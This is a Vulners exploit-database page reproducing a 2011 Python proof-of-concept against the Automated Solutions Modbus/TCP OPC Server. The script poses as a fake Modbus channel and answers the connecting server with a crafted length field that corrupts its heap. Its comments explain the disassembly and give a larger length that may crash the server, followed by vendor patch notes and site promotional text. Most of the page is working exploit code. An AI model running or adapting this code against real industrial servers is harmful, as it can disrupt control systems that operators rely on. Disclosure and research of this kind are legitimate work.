Vulners
Lucene search
Automated Solutions Modbus/TCP OPC Server Heap Corruption
`#!/usr/bin/python
# asmb-heap.py
# Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# A specially crafted length field in a MODBUS packet header can trigger heap corruption.
#
# 00408312 |> 8B5424 3C MOV EDX,DWORD PTR SS:[ESP+3C] -> move length into edx
# 00408316 |. 53 PUSH EBX -> push src onto stack
# 00408317 |. 8B5C24 3C MOV EBX,DWORD PTR SS:[ESP+3C] -> move dest into ebx
# 0040831B |. 8BCA MOV ECX,EDX -> move length into ecx
# 0040831D |. 55 PUSH EBP -> push ebp onto stack
# 0040831E |. 8BE9 MOV EBP,ECX -> move ecx into ebp
# 00408320 |. 57 PUSH EDI -> push edi onto stack
# 00408321 |. 33C0 XOR EAX,EAX -> eax = 0
# 00408323 |. 8BFB MOV EDI,EBX -> move dest into edi
# 00408325 |. 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX -> move ebx into dword at esp+1c
# 00408329 |. C1E9 02 SHR ECX,2 -> shift ecx right twice
# 0040832C |. F3:AB REP STOS DWORD PTR ES:[EDI] -> fill ecx dwords at edi with eax
#
# So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords
# it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,
# they are NULL. However, we can still write past the bounds of the allocated chunk of memory.
#
# Although it seems unlikely code execution could result, it is still possible to write data
# past the memory allocated on a heap (0x350000) available in the server process.
#
# This code works by setting up a fake channel and accepting a connection. To trigger this
# vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)
# with this fake channel and the results depend on the response you choose.
#
# I tested version 3 running on Windows. Testing the server with this code and its default
# response should't cause the server to crash (immediately anyways). Larger lengths (such as
# the one commented out) may cause the server to crash.
#
# Patch: http://automatedsolutions.com/demos/demoform.asp?code=17
#
import sys
import socket
port=502
# [trans] [prot] [len] [u] [f] [bc] [data]
resp="\x00\x00"+"\x00\x00"+"\x02\x01"+"\x00"+"\x03"+"\x02"+"\x00\x00" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)
#resp="\x00\x00"+"\x00\x00"+"\x02\xb0"+"\x00"+"\x03"+"\x02"+"\x00\x00" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind(("",port))
sock.listen(1)
conn,addr=sock.accept()
except IOError,e:
print e
print "OPC server at %s connected\n"%addr[0]
req=conn.recv(32)
print "<-- %s"%req.encode("hex")
conn.send(resp)
print "--> %s\n"%resp.encode("hex")
conn.close()
print "finished, check server"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jan 2011 00:00Current
0.5Low risk
Vulners AI Score0.5